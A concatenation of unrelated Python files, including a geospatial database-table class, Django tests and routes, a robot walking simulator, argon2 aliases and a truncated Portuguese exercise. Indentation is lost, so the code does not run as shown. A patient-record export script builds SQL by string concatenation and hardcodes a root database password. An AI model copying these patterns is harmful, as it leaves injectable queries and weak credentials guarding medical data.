class DatabaseTable(ABC):
DEFAULT_PORT = NotImplementedError
FIELD_TYPES: {str: str} = NotImplementedError
def __init__(
self,
resource: str,
table_name: str,
database: str = None,
fields: {str: type} = None,
primary_key: Union[str, Sequence[str]] = None,
crs: CRS = None,
username: str = None,
password: str = None,
users: [str] = None,
logger: Logger = None,
):
"""
Create a new database table interface.
:param resource: URL of database server as `hostname:port`
:param table_name: name of table in database
:param database: name of database in server
:param fields: dictionary of fields
:param primary_key: primary key field(s)
:param crs: coordinate reference system of table geometries
:param username: username to connect ot database
:param password: password to connect to database
:param users: list of database users / roles
"""
self.__database = database
self.__name = table_name
self.__fields = fields
if logger is None:
logger = get_logger('dummy', console_level=logging.NOTSET)
self.logger = logger
if resource is not None:
if Path(resource).exists():
port = None
else:
credentials = parse_hostname(resource)
resource = credentials['hostname']
port = credentials['port']
if port is None:
port = self.DEFAULT_PORT
if username is None:
username = credentials['username']
if password is None:
password = credentials['password']
else:
port = None
self.__resource = resource
self.__port = port
if username is not None and ':' in username:
username, password = username.split(':', 1)
self.__username = username
self.__password = password
if primary_key is None:
primary_key = [list(self.fields)[0]] if self.fields is not None else None
elif not isinstance(primary_key, Sequence) or isinstance(primary_key, str):
primary_key = [primary_key]
self.__primary_key = primary_key
if crs is not None:
crs = parse_crs(crs)
elif len(self.geometry_fields) > 0:
crs = DEFAULT_CRS
self.logger.warning(
f'no CRS provided for geometry fields; defaulting to EPSG:{crs.to_epsg()}'
)
else:
crs = None
self.__crs = crs
if users is None:
users = []
self.__users = users
if self.fields is None and not self.exists:
raise TableNotFoundError(
f'fields must be specified when creating a table; table does not exist at "{self.database}:{self.name}"'
)
@property
def resource(self) -> str:
return self.__resource
@property
def port(self) -> int:
return self.__port
@property
def database(self) -> str:
return self.__database
@property
def name(self) -> str:
return self.__name
@property
def fields(self) -> {str: type}:
if self.__fields is None:
self.__fields = self.remote_fields
return self.__fields
@property
def primary_key(self) -> [str]:
return self.__primary_key
@property
def crs(self) -> CRS:
return self.__crs
@property
def username(self) -> str:
return self.__username
@property
def users(self) -> [str]:
return self.__users
@property
@abstractmethod
def exists(self) -> bool:
raise NotImplementedError
@property
@abstractmethod
def schema(self) -> str:
""" SQL schema string """
raise NotImplementedError
@property
def geometry_fields(self) -> {str: type}:
""" local fields with geometry type """
geometry_fields = {}
if self.fields is not None:
for field, field_type in self.fields.items():
while isinstance(field_type, Sequence) and not isinstance(field_type, str):
if len(field_type) > 0:
field_type = field_type[0]
else:
field_type = list
if field_type.__name__ in GEOMETRY_TYPES:
geometry_fields[field] = field_type
return geometry_fields
@property
@abstractmethod
def remote_fields(self) -> {str: type}:
""" fields at remote table """
raise NotImplementedError
@property
def connected(self) -> bool:
""" whether network connection exists to database server """
try:
socket.setdefaulttimeout(2)
socket.socket(socket.AF_INET, socket.SOCK_STREAM).connect(
(self.resource, self.port)
)
return True
except socket.error:
return False
@property
def records(self) -> [{str: Any}]:
""" list of records in the table """
return self.records_where(None)
@abstractmethod
def records_where(
self, where: Union[Mapping[str, Any], str, Sequence[str]]
) -> [{str: Any}]:
"""
list of records in the table that match the query
:param where: dictionary mapping keys to values, with which to match records
:return: dictionaries of matching records
"""
raise NotImplementedError
@abstractmethod
def insert(self, records: [{str: Any}]):
"""
insert the list of records into the table
:param records: dictionary records
"""
raise NotImplementedError
@abstractmethod
def delete_where(self, where: Union[Mapping[str, Any], str, Sequence[str]]):
"""
delete records from the table matching the given query
:param where: dictionary mapping keys to values, with which to match records
"""
raise NotImplementedError
def __getitem__(self, key: Any) -> {str: Any}:
"""
Return the record matching the given primary key value.
:param key: value of primary key
:return: dictionary record
"""
if isinstance(key, dict):
if not all(field in key for field in self.primary_key):
raise ValueError(f'does not contain "{self.primary_key}"')
where = key
else:
if isinstance(key, Generator):
key = list(key)
elif not isinstance(key, Sequence) or isinstance(key, str):
key = [key]
if len(key) != len(self.primary_key):
raise ValueError(f'ambiguous value for primary key "{self.primary_key}"')
where = {field: key[index] for index, field in enumerate(self.primary_key)}
if not self.connected:
raise ConnectionError(
f'no connection to {self.username}@{self.resource}:{self.port}/{self.database}/{self.name}'
)
try:
records = self.records_where(where)
if len(records) > 1:
self.logger.warning(
f'found more than one record matching query {where}: {records}'
)
if len(records) > 0:
return records[0]
else:
raise KeyError(f'no record with primary key "{key}"')
except:
raise KeyError(f'no record with primary key "{key}"')
def __setitem__(self, key: Any, record: {str: Any}):
"""
Insert the given record into the table.
:param key: value of primary key at which to insert record
:param record: dictionary record
"""
if isinstance(key, Generator):
key = list(key)
elif isinstance(key, dict):
if not all(field in key for field in self.primary_key):
raise KeyError(f'does not contain "{self.primary_key}"')
key = [key[field] for field in self.primary_key]
elif not isinstance(key, Sequence) or isinstance(key, str):
key = [key]
for key_index, primary_key in enumerate(self.primary_key):
record[primary_key] = key[key_index]
if not self.connected:
raise ConnectionError(
f'no connection to {self.username}@{self.resource}:{self.port}/{self.database}/{self.name}'
)
self.insert([record])
def __delitem__(self, key: Any):
"""
Delete the record matching the given primary key value.
:param key: value of primary key
"""
if isinstance(key, dict):
if not all(field in key for field in self.primary_key):
raise ValueError(f'does not contain "{self.primary_key}"')
where = key
else:
if isinstance(key, Generator):
key = list(key)
elif not isinstance(key, Sequence) or isinstance(key, str):
key = [key]
if len(key) != len(self.primary_key):
raise ValueError(f'ambiguous value for primary key "{self.primary_key}"')
where = {field: key[index] for index, field in enumerate(self.primary_key)}
if not self.connected:
raise ConnectionError(
f'no connection to {self.username}@{self.resource}:{self.port}/{self.database}/{self.name}'
)
try:
self.delete_where(where)
except:
raise KeyError(f'no record with primary key "{key}"')
def __len__(self) -> int:
return len(self.records)
def __contains__(self, key: Any) -> bool:
if not self.connected:
raise ConnectionError(
f'no connection to {self.username}@{self.resource}:{self.port}/{self.database}/{self.name}'
)
try:
self[key]
return True
except KeyError:
return False
def __iter__(self) -> Generator:
yield from self.records
@abstractmethod
def delete_table(self):
raise NotImplementedError
def __repr__(self) -> str:
return (
f'{self.__class__.__name__}({repr(self.database)}, {repr(self.name)}, {repr(self.fields)}, {repr(self.primary_key)}, '
f'{repr(self.resource)}, {repr(self.username)}, {repr("*" * len(self.password))}, {repr(self.users)})'
)
def random_open_tcp_port() -> int:
open_socket = socket.socket()
open_socket.bind(('', 0))
return open_socket.getsockname()[1]
def crs_key(crs: CRS) -> str:
if not isinstance(crs, CRS):
crs = parse_crs(crs)
return crs.wkt.split('"')[1]
def is_compound_crs(crs: CRS) -> bool:
if not isinstance(crs, CRS):
crs = parse_crs(crs)
return 'COMPD_CS' in crs.wkt or 'COMPOUNDCRS' in crs.wkt
def split_compound_crs(crs: CRS) -> [CRS]:
"""
Split the given compound coordinate reference system into its constituent CRS parts.
:param crs: compound CRS
:returns: list of CRS parts
"""
if type(crs) is not CRS:
crs = parse_crs(crs)
if is_compound_crs(crs):
working_string = crs.wkt
# remove the compound CRS keyword and name from the string, along with the closing bracket
working_string = working_string.split(',', 1)[-1][:-1]
wkts = []
while len(working_string) > 0:
opening_brackets = 0
closing_brackets = 0
for index, character in enumerate(working_string):
if character == '[':
opening_brackets += 1
elif character == ']':
closing_brackets += 1
if opening_brackets > 0 and opening_brackets == closing_brackets:
wkts.append(working_string[: index + 1])
working_string = working_string[index + 2 :]
break
else:
wkts.append(working_string)
break
return [CRS.from_string(wkt) for wkt in wkts]
def compound_crs(crs_list: [CRS], key: str = None) -> CRS:
"""
Build a compound coordinate reference system from the provided list of constituent CRSs.
:param crs_list: list of coordinate reference systems
:param key: name of CRS
:returns: compound CRS
"""
crs_list = [crs if type(crs) is CRS else parse_crs(crs) for crs in crs_list]
if key is None:
key = ' + '.join(crs_key(crs) for crs in crs_list)
# TODO is keyword specced as COMPOUNDCRS?
return CRS.from_string(f'COMPD_CS["{key}", {", ".join(crs.wkt for crs in crs_list)}]')
def parse_crs(crs: Union[str, int]) -> CRS:
"""
Parse a CRS object from the given well-known text or EPSG code.
:param crs: coordinate reference system; either well-known text or an EPSG code
:returns: CRS object
"""
if isinstance(crs, CRS):
return crs
elif (
isinstance(crs, str)
and '+' in crs
and 'COMPD_CS' not in crs
and 'COMPOUNDCRS' not in crs
):
return compound_crs([parse_crs(crs_part.strip()) for crs_part in crs.split('+')])
else:
try:
return CRS.from_epsg(int(crs))
except ValueError:
return CRS.from_string(str(crs))
def flatten_geometry(geometry: BaseGeometry) -> BaseGeometry:
geometry_type = type(geometry)
# strip 3rd dimension
if 'POLYGON Z' in geometry.wkt:
polygons = (
[polygon for polygon in geometry] if geometry_type is MultiPolygon else [geometry]
)
for polygon_index, polygon in enumerate(polygons):
exterior_2d = LinearRing([vertex[:2] for vertex in polygon.exterior.coords])
interiors_2d = [
LinearRing([vertex[:2] for vertex in interior.coords])
for interior in polygon.interiors
]
polygons[polygon_index] = Polygon(exterior_2d, interiors_2d)
geometry = (
MultiPolygon(polygons) if geometry_type is MultiPolygon else Polygon(polygons[0])
)
if not geometry.is_valid:
geometry = geometry.buffer(0)
return geometry
def parse_record_values(record: {str: Any}, field_types: {str: type}) -> {str: Any}:
"""
Parse the values in the given record into their respective field types.
:param record: dictionary mapping fields to values
:param field_types: dictionary mapping fields to types
:return: record with values parsed into their respective types
"""
for field, value in record.items():
if field in field_types:
field_type = field_types[field]
record[field] = convert_value(value, field_type)
return record
|
import django
import pytest
from anylink.models import AnyLink
from markymark.templatetags.markymark import markdown_filter
from markymark.widgets import MarkdownTextarea
@pytest.mark.skipif(django.VERSION[0] >= 2, reason='Requires Django<2')
@pytest.mark.django_db
class TestFilerFileExtension:
def setup(self):
from .factories.files import FileFactory, ImageFactory
self.file = FileFactory.create()
self.image = ImageFactory.create()
def test_invalid_tag(self):
assert markdown_filter('foo [file:123 bar') == ('<p>foo [file:123 bar</p>')
def test_file_not_found_debug(self, settings):
from filer.models.filemodels import File
settings.DEBUG = True
with pytest.raises(File.DoesNotExist):
markdown_filter('[file:999]')
def test_file_not_found_no_debug(self, settings):
settings.DEBUG = False
assert markdown_filter('foo [file:999] bar') == ('<p>foo bar</p>')
def test_file_render_success(self):
expected = '<p><a href="{0}">{0}</a></p>'.format(self.file.url)
assert expected == markdown_filter('[file:{0}]'.format(self.file.pk))
def test_image_render_success(self):
expected = '<p><img src="{0}" alt="{1}" title="{2}"></p>'.format(
self.image.url, self.image.default_alt_text, self.image.default_caption)
assert expected == markdown_filter('[file:{0}]'.format(self.image.pk))
def test_media(self):
widget = MarkdownTextarea()
assert 'markymark/extensions/filer.css' in widget.media._css['all']
assert 'markymark/extensions/filer.js' in widget.media._js
@pytest.mark.django_db
class TestAnylinkExtension:
def setup(self):
self.link = AnyLink.objects.create(link_type='external_url', external_url='/test/')
def test_invalid_tag(self):
assert markdown_filter('foo [link:123 bar') == ('<p>foo [link:123 bar</p>')
def test_link_not_found_debug(self, settings):
settings.DEBUG = True
with pytest.raises(AnyLink.DoesNotExist):
markdown_filter('[link:999]')
def test_link_not_found_no_debug(self, settings):
settings.DEBUG = False
markdown_filter('[link:999]') == '<p></p>'
def test_file_render_success(self):
expected = '<p><a href="{0}" title="" target="_self"></a></p>'.format(
self.link.external_url)
assert expected == markdown_filter('[link:{0}]'.format(self.link.pk))
class TestAutoLinkExtension:
def test_valid_http_link(self):
url = 'https://www.youtube.com/watch?v=FTuFVwnrcts'
expected = '<p><a href="{0}">{0}</a></p>'.format(url)
assert expected == markdown_filter(url)
def test_valid_mailto_link(self):
url = 'mailto:test@example.com'
expected = '<p><a href="{0}">test@example.com</a></p>'.format(url)
assert expected == markdown_filter(url)
def test_invalid_link(self):
url = 'www.example.com'
expected = '<p>{0}</p>'.format(url)
assert expected == markdown_filter(url)
def test_dont_render_link_twice_url(self):
url = '<a href="http://www.example.com/">test</a>'
expected = '<p>{0}</p>'.format(url)
assert expected == markdown_filter(url)
def test_dont_render_link_twice_name(self):
url = '<a href="http://www.example.com/">http://www.example.com/</a>'
expected = '<p>{0}</p>'.format(url)
assert expected == markdown_filter(url)
def test_dont_hijack_images(self):
md = ''
expected = (
'<p><img alt="" src="https://mirrors.creativecommons.org/presskit/'
'icons/cc.large.png" /></p>'
)
assert markdown_filter(md) == expected
|
"""
@author: David Lei
@since: 21/08/2016
@modified:
"""
|
#!/usr/bin/python
# -*- coding:utf-8 -*-
# Download data into Excel
# Date for Version 2: 2020.04.08
import MySQLdb
import xlrd,xlwt
import time
from datetime import datetime
import os
def getData():
file_new = xlwt.Workbook(encoding = 'utf-8')
sheet_1 = file_new.add_sheet('main')
# prepare some settings
dateFormat = xlwt.XFStyle()
dateFormat.num_format_str = 'yyyy-mm-dd'
warning_style = xlwt.XFStyle()
fnt = xlwt.Font()
fnt.colour_index = 2
warning_style.font = fnt
tt = 60*60*24
s_date = int(datetime(1899, 12, 31).timestamp()/tt)-2
conn = MySQLdb.connect( host = 'localhost',
user = 'root',
passwd = '1',
db = 'Test',
charset= 'utf8')
conn.autocommit(1)
cur = conn.cursor()
base_col_names = ["name","sex","age","marriage","site","stage","surgery","radiotherapy","chemotherapy"]
lab_col_names = ["CEA","CA199"]
pathology_col_names = ["patho_diagnosis","lym_vas_invasion","tot_lymph_node","deep","pni","pos_lymph_node"]
surgery_col_names = ["resection_way"]
chemotherapy_col_names = ["chemo_way","chemo_way_other","last_chemo","chemo_time_0","chemo_time_1","chemo_time_2","chemo_way_0","chemo_way_1","chemo_way_2","desc_0","desc_1","desc_2"]
radiotherapy_col_names = ["radio_count","radio_start","radio_end"]
follow_up_col_names = ["recurrance"]
base_col_labels = ["姓名","性别","年龄","婚姻情况","肿瘤部位","分期","是否手术","是否放疗","是否化疗"]
lab_col_labels = ["CEA","CA199"]
pathology_col_labels = ["病理诊断","脉管癌栓","淋巴结数","浸润深度","神经侵犯","淋巴阳性"]
surgery_col_labels = ["手术方式"]
chemotherapy_col_labels = ["化疗方案","化疗方案_other","上次化疗时间","化疗时间_0","化疗时间_1","化疗时间_2","化疗方案_0","化疗方案_1","化疗方案_2","描述_0","描述_1","描述_2"]
radiotherapy_col_labels = ["放疗次数","放疗开始","放疗结束"]
follow_up_col_labels = ["是否复发"]
base_col = len(base_col_names)
lab_col = len(lab_col_names)
pathology_col = len(pathology_col_names)
surgery_col = len(surgery_col_names)
chemotherapy_col = len(chemotherapy_col_names)
radiotherapy_col = len(radiotherapy_col_names)
follow_up_col = len(follow_up_col_names)
sql = "SELECT patient_id,base,lab,pathology,surgery,chemotherapy,radiotherapy,follow_up FROM data_status"
cur.execute(sql)
patient_id = []
base_page_max = 0
lab_page_max = 0
pathology_page_max = 0
surgery_page_max = 0
chemotherapy_page_max = 0
radiotherapy_page_max = 0
follow_up_page_max = 0
for row in cur:
patient_id.extend([row[0]])
base_page_status = str(row[1])
base_page_status = str(int(base_page_status[::-1]))[::-1] # delete 0 in tail
base_page_max = max(base_page_max,len(base_page_status))
lab_page_status = str(row[2])
lab_page_status = str(int(lab_page_status[::-1]))[::-1] # delete 0 in tail
lab_page_max = max(lab_page_max,len(lab_page_status))
pathology_page_status = str(row[3])
pathology_page_status = str(int(pathology_page_status[::-1]))[::-1] # delete 0 in tail
pathology_page_max = max(pathology_page_max,len(pathology_page_status))
surgery_page_status = str(row[4])
surgery_page_status = str(int(surgery_page_status[::-1]))[::-1] # delete 0 in tail
surgery_page_max = max(surgery_page_max,len(surgery_page_status))
chemotherapy_page_status = str(row[5])
chemotherapy_page_status = str(int(chemotherapy_page_status[::-1]))[::-1] # delete 0 in tail
chemotherapy_page_max = max(chemotherapy_page_max,len(chemotherapy_page_status))
radiotherapy_page_status = str(row[6])
radiotherapy_page_status = str(int(radiotherapy_page_status[::-1]))[::-1] # delete 0 in tail
radiotherapy_page_max = max(radiotherapy_page_max,len(radiotherapy_page_status))
follow_up_page_status = str(row[7])
follow_up_page_status = str(int(follow_up_page_status[::-1]))[::-1] # delete 0 in tail
follow_up_page_max = max(follow_up_page_max,len(follow_up_page_status))
row_max = len(patient_id)
col_max = base_col*base_page_max + lab_col*lab_page_max + pathology_col*pathology_page_max + surgery_col*surgery_page_max + chemotherapy_col*chemotherapy_page_max + radiotherapy_col*radiotherapy_page_max + follow_up_col*follow_up_page_max + 1
matrix = [list("" for i in range(col_max)) for i in range(row_max+2)]
for ii in range(len(patient_id)):
patient = patient_id[ii]
kk = 0
for i in range(base_page_max):
page = "base_" + str(i)
sql = "SELECT name,sex,age,marriage,site,stage,surgery,radiotherapy,chemotherapy FROM " + page + " WHERE patient_id='" + patient + "'"
cur.execute(sql)
record = []
for row in cur:
record = row
if len(record)==0:
record = ["" for j in range(base_col)]
for v in record:
kk = kk + 1
matrix[ii+2][kk] = v
for i in range(lab_page_max):
page = "lab_" + str(i)
sql = "SELECT CEA,CA199 FROM " + page + " WHERE patient_id='" + patient + "'"
cur.execute(sql)
record = []
for row in cur:
record = row
if len(record)==0:
record = ["" for j in range(lab_col)]
for v in record:
kk = kk + 1
matrix[ii+2][kk] = v
for i in range(pathology_page_max):
page = "pathology_" + str(i)
sql = "SELECT patho_diagnosis,lym_vas_invasion,tot_lymph_node,deep,pni,pos_lymph_node FROM " + page + " WHERE patient_id='" + patient + "'"
cur.execute(sql)
record = []
for row in cur:
record = row
if len(record)==0:
record = ["" for j in range(pathology_col)]
for v in record:
kk = kk + 1
matrix[ii+2][kk] = v
for i in range(surgery_page_max):
page = "surgery_" + str(i)
sql = "SELECT resection_way FROM " + page + " WHERE patient_id='" + patient + "'"
cur.execute(sql)
record = []
for row in cur:
record = row
if len(record)==0:
record = ["" for j in range(surgery_col)]
for v in record:
kk = kk + 1
matrix[ii+2][kk] = v
for i in range(chemotherapy_page_max):
page = "chemotherapy_" + str(i)
sql = "SELECT chemo_way,chemo_way_other,last_chemo,chemo_time_0,chemo_time_1,chemo_time_2,chemo_way_0,chemo_way_1,chemo_way_2,desc_0,desc_1,desc_2 FROM " + page + " WHERE patient_id='" + patient + "'"
cur.execute(sql)
record = []
for row in cur:
record = row
if len(record)==0:
record = ["" for j in range(chemotherapy_col)]
for v in record:
kk = kk + 1
matrix[ii+2][kk] = v
for i in range(radiotherapy_page_max):
page = "radiotherapy_" + str(i)
sql = "SELECT radio_count,radio_start,radio_end FROM " + page + " WHERE patient_id='" + patient + "'"
cur.execute(sql)
record = []
for row in cur:
record = row
if len(record)==0:
record = ["" for j in range(radiotherapy_col)]
for v in record:
kk = kk + 1
matrix[ii+2][kk] = v
for i in range(follow_up_page_max):
page = "follow_up_" + str(i)
sql = "SELECT recurrance FROM " + page + " WHERE patient_id='" + patient + "'"
cur.execute(sql)
record = []
for row in cur:
record = row
if len(record)==0:
record = ["" for j in range(follow_up_col)]
for v in record:
kk = kk + 1
matrix[ii+2][kk] = v
col_names_all = ["patient_id"]
col_labels_all = ["病例号"]
for i in range(base_page_max):
name_suffix = "_form"+str(i+1)
label_suffix = "_表"+str(i+1)
if i==0:
name_suffix = ""
label_suffix = ""
col_names = []
col_labels = []
for j in range(len(base_col_names)):
col_name = base_col_names[j]
col_label = base_col_labels[j]
col_names.extend([col_name+name_suffix])
col_labels.extend([col_label+label_suffix])
col_names_all.extend(col_names)
col_labels_all.extend(col_labels)
for i in range(lab_page_max):
name_suffix = "_form"+str(i+1)
label_suffix = "_表"+str(i+1)
if i==0:
name_suffix = ""
label_suffix = ""
col_names = []
col_labels = []
for j in range(len(lab_col_names)):
col_name = lab_col_names[j]
col_label = lab_col_labels[j]
col_names.extend([col_name+name_suffix])
col_labels.extend([col_label+label_suffix])
col_names_all.extend(col_names)
col_labels_all.extend(col_labels)
for i in range(pathology_page_max):
name_suffix = "_form"+str(i+1)
label_suffix = "_表"+str(i+1)
if i==0:
name_suffix = ""
label_suffix = ""
col_names = []
col_labels = []
for j in range(len(pathology_col_names)):
col_name = pathology_col_names[j]
col_label = pathology_col_labels[j]
col_names.extend([col_name+name_suffix])
col_labels.extend([col_label+label_suffix])
col_names_all.extend(col_names)
col_labels_all.extend(col_labels)
for i in range(surgery_page_max):
name_suffix = "_form"+str(i+1)
label_suffix = "_表"+str(i+1)
if i==0:
name_suffix = ""
label_suffix = ""
col_names = []
col_labels = []
for j in range(len(surgery_col_names)):
col_name = surgery_col_names[j]
col_label = surgery_col_labels[j]
col_names.extend([col_name+name_suffix])
col_labels.extend([col_label+label_suffix])
col_names_all.extend(col_names)
col_labels_all.extend(col_labels)
for i in range(chemotherapy_page_max):
name_suffix = "_form"+str(i+1)
label_suffix = "_表"+str(i+1)
if i==0:
name_suffix = ""
label_suffix = ""
col_names = []
col_labels = []
for j in range(len(chemotherapy_col_names)):
col_name = chemotherapy_col_names[j]
col_label = chemotherapy_col_labels[j]
col_names.extend([col_name+name_suffix])
col_labels.extend([col_label+label_suffix])
col_names_all.extend(col_names)
col_labels_all.extend(col_labels)
for i in range(radiotherapy_page_max):
name_suffix = "_form"+str(i+1)
label_suffix = "_表"+str(i+1)
if i==0:
name_suffix = ""
label_suffix = ""
col_names = []
col_labels = []
for j in range(len(radiotherapy_col_names)):
col_name = radiotherapy_col_names[j]
col_label = radiotherapy_col_labels[j]
col_names.extend([col_name+name_suffix])
col_labels.extend([col_label+label_suffix])
col_names_all.extend(col_names)
col_labels_all.extend(col_labels)
for i in range(follow_up_page_max):
name_suffix = "_form"+str(i+1)
label_suffix = "_表"+str(i+1)
if i==0:
name_suffix = ""
label_suffix = ""
col_names = []
col_labels = []
for j in range(len(follow_up_col_names)):
col_name = follow_up_col_names[j]
col_label = follow_up_col_labels[j]
col_names.extend([col_name+name_suffix])
col_labels.extend([col_label+label_suffix])
col_names_all.extend(col_names)
col_labels_all.extend(col_labels)
for j in range(col_max):
matrix[0][j] = col_labels_all[j]
matrix[1][j] = col_names_all[j]
for i in range(row_max):
matrix[i+2][0] = patient_id[i]
for i in range(row_max+2):
for j in range(col_max):
sheet_1.write(i, j, label=matrix[i][j])
# save the file
new_file = 'download/data.xls'
if os.path.exists(new_file):
os.remove(new_file)
file_new.save(new_file)
getData()
|
from django.urls import include, path
from .views import login, logoutFlutter, daftar, json_fb, fb_json, feedback_json, ListFeedback, DetailFeedback
urlpatterns = [
path('', login, name='loginflutter'),
path('logout', logoutFlutter, name='logoutflutter'),
path('daftar', daftar, name='daftarflutter'),
# path('json_fb', feedback_json, name='json_fb'),
path('json_fb', ListFeedback.as_view()),
path('<int:pk>/', DetailFeedback.as_view())
]
|
#!/usr/bin/env python
import time
from threading import Thread
import pybullet as p
from .core.op3 import OP3
from .walking.wfunc import WFunc
class Walker(OP3):
"""
Class for making Darwin walk
"""
def __init__(self, x_vel=1, y_vel=0, ang_vel=0, interval=0.0054, *args, **kwargs):
OP3.__init__(self, *args, **kwargs)
self.running = False
self.velocity = [0, 0, 0]
self.walking = False
self.x_vel = x_vel
self.y_vel = y_vel
self.ang_vel = ang_vel
self.sld_x_vel = p.addUserDebugParameter("x_vel", -10, 10, x_vel)
self.sld_y_vel = p.addUserDebugParameter("y_vel", -10, 10, y_vel)
self.sld_ang_vel = p.addUserDebugParameter("ang_vel", -10, 10, ang_vel)
self.wfunc = WFunc()
# ~ self.ready_pos=get_walk_angles(10)
self.ready_pos = self.wfunc.get(True, 0, [0, 0, 0])
self.ready_pos.update({"r_sho_pitch": 0, "l_sho_pitch": 0,
"r_sho_roll": -1.0, "l_sho_roll": 1.0,
"r_el": 0.5, "l_el": -0.5})
self._th_walk = None
self.sld_interval = p.addUserDebugParameter("step_interval", 0.001, 0.01, interval)
self.save_button = p.addUserDebugParameter("save parameters", 1, -1, 1)
self.check_gui_th()
def cmd_vel(self, vx, vy, vt):
print("cmdvel", (vx, vy, vt))
self.start()
self.set_velocity(vx, vy, vt)
def init_walk(self):
"""
If not there yet, go to initial walk position
"""
if self.get_dist_to_ready() > 0.02:
self.set_angles_slow(self.ready_pos)
def start(self):
if not self.running:
print("Start Walking")
self.running = True
self.init_walk()
self._th_walk = Thread(target=self._do_walk)
self._th_walk.start()
self.walking = True
def stop(self):
if self.running:
self.walking = False
print("Waiting for stopped")
while self._th_walk is not None:
time.sleep(0.1)
print("Stopped")
self.running = False
def set_velocity(self, x, y, t):
self.velocity = [x, y, t]
def check_gui_th(self):
def check_gui():
while True:
curr_x_vel = p.readUserDebugParameter(self.sld_x_vel)
curr_y_vel = p.readUserDebugParameter(self.sld_y_vel)
curr_ang_vel = p.readUserDebugParameter(self.sld_ang_vel)
if self.x_vel != curr_x_vel or \
self.y_vel != curr_y_vel or \
self.ang_vel != curr_ang_vel:
self.x_vel = curr_x_vel
self.y_vel = curr_y_vel
self.ang_vel = curr_ang_vel
self.velocity = [self.x_vel, self.y_vel, self.ang_vel]
self.camera_follow(distance=0.5)
time.sleep(0.01)
Thread(target=check_gui).start()
def _do_walk(self):
"""
Main walking loop, smoothly update velocity vectors and apply corresponding angles
"""
# Global walk loop
n = 50
phrase = True
i = 0
self.current_velocity = [0, 0, 0]
while self.walking or i < n or self.is_walking():
if not self.walking:
self.velocity = [0, 0, 0]
elif not self.is_walking() and i == 0: # Do not move if nothing to do and already at 0
self.update_velocity(self.velocity, n)
time.sleep(p.readUserDebugParameter(self.sld_interval) / self.sim_speed)
continue
x = float(i) / n
angles = self.wfunc.get(phrase, x, self.current_velocity)
self.update_velocity(self.velocity, n)
self.set_angles(angles)
i += 1
if i > n:
i = 0
phrase = not phrase
time.sleep(p.readUserDebugParameter(self.sld_interval) / self.sim_speed)
self._th_walk = None
def is_walking(self):
e = 0.02
for v in self.current_velocity:
if abs(v) > e: return True
return False
def rescale(self, angles, coef):
z = {}
for j, v in angles.items():
offset = self.ready_pos[j]
v -= offset
v *= coef
v += offset
z[j] = v
return z
def update_velocity(self, target, n):
a = 3 / float(n)
b = 1 - a
self.current_velocity = [a * t + b * v for (t, v) in zip(target, self.current_velocity)]
def get_dist_to_ready(self):
angles = self.get_angles()
return get_distance(self.ready_pos, angles)
def reset(self):
self.stop()
p.resetBasePositionAndOrientation(self.robot, self.op3StartPos, self.op3StartOrientation)
self.start()
self.set_velocity(self.x_vel, self.y_vel, self.ang_vel)
def interpolate(anglesa, anglesb, coefa):
z = {}
joints = anglesa.keys()
for j in joints:
z[j] = anglesa[j] * coefa + anglesb[j] * (1 - coefa)
return z
def get_distance(anglesa, anglesb):
d = 0
joints = anglesa.keys()
if len(joints) == 0: return 0
for j in joints:
d += abs(anglesb[j] - anglesa[j])
d /= len(joints)
return d
|
"""
Legacy mid-level functions.
"""
from __future__ import absolute_import, division, print_function
import os
from ._password_hasher import (
DEFAULT_HASH_LENGTH,
DEFAULT_MEMORY_COST,
DEFAULT_PARALLELISM,
DEFAULT_RANDOM_SALT_LENGTH,
DEFAULT_TIME_COST,
)
from .low_level import Type, hash_secret, hash_secret_raw, verify_secret
def hash_password(password, salt=None,
time_cost=DEFAULT_TIME_COST,
memory_cost=DEFAULT_MEMORY_COST,
parallelism=DEFAULT_PARALLELISM,
hash_len=DEFAULT_HASH_LENGTH,
type=Type.I):
"""
Legacy alias for :func:`hash_secret` with default parameters.
.. deprecated:: 16.0.0
Use :class:`argon2.PasswordHasher` for passwords.
"""
if salt is None:
salt = os.urandom(DEFAULT_RANDOM_SALT_LENGTH)
return hash_secret(
password, salt, time_cost, memory_cost, parallelism, hash_len, type
)
def hash_password_raw(password, salt=None,
time_cost=DEFAULT_TIME_COST,
memory_cost=DEFAULT_MEMORY_COST,
parallelism=DEFAULT_PARALLELISM,
hash_len=DEFAULT_HASH_LENGTH,
type=Type.I):
"""
Legacy alias for :func:`hash_secret_raw` with default parameters.
.. deprecated:: 16.0.0
Use :class:`argon2.PasswordHasher` for passwords.
"""
if salt is None:
salt = os.urandom(DEFAULT_RANDOM_SALT_LENGTH)
return hash_secret_raw(
password, salt, time_cost, memory_cost, parallelism, hash_len, type
)
def verify_password(hash, password, type=Type.I):
"""
Legacy alias for :func:`verify_secret` with default parameters.
.. deprecated:: 16.0.0
Use :class:`argon2.PasswordHasher` for passwords.
"""
return verify_secret(hash, password, type)
|
"""Viajar é bom demais! Uma agência de viagens está propondo uma estratégia para alavancar as vendas após os impactos da pandemia do coronavírus.
A empresa ofertará descontos progressivos na compra de pacotes, dependendo do número de viajantes que estão no mesmo grupo e moram na mesma residência.
Para ajudar a tornar esse projeto real, você deve criar um algoritmo que receba o VALOR BRUTO do pacote, a CATEGORIA DOS ASSENTOS no vôo e a
QUANTIDADE DE VIAJANTES que moram em uma mesma casa e calcule os descontos de acordo com a tabela abaixo. O programa deverá exibir o valor BRUTO DA VIAGEM
(o mesmo que foi digitado), o VALOR DO DESCONTO, o VALOR LÍQUIDO DA VIAGEM (valor bruto menos os descontos) e o VALOR MÉDIO POR VIAJANTE."""
bruto = float(input("Digite o valor bruto do pacote: R$ "))
categoria = str(input("Digite a categoria dos assentos no vôo: ")).upper()
viajantes = int(input("Digite a quantidade de viajantes: "))
if categoria == 'ECONOMICA' and viajantes == 2:
desconto = bruto * 0.03
liquido = bruto - desconto
media = liquido/viajantes
elif categoria == 'ECONOMICA' and viajantes == 3:
desconto = bruto * 0.04
liquido = bruto - desconto
media = liquido/viajantes
elif categoria == 'ECONOMICA' and viajantes >= 4:
desconto = bruto * 0.05
liquido = bruto - desconto
media = liquido/viajantes
elif categoria == 'EXECUTIVA' and viajantes == 2:
desconto = bruto * 0.05
liquido = bruto - desconto
media = liquido/viajantes
elif categoria == 'EXECUTIVA' and viajantes == 3:
desconto = bruto * 0.07
liquido = bruto - desconto
media = liquido/viajantes
elif categoria == 'EXECUTIVA' and viajantes >= 4:
desconto = bruto * 0.08
liquido = bruto - desconto
media = liquido/viajantes
elif categoria == 'PRIMEIRA CLASSE' and viajantes == 2:
desconto = bruto * 0.10
liquido = bruto - desconto
media = liquido/viajantes
elif categoria == 'PRIMEIRA CLASSE' and viajantes == 3:
desconto = bruto * 0.15
liquido = bruto - desconto
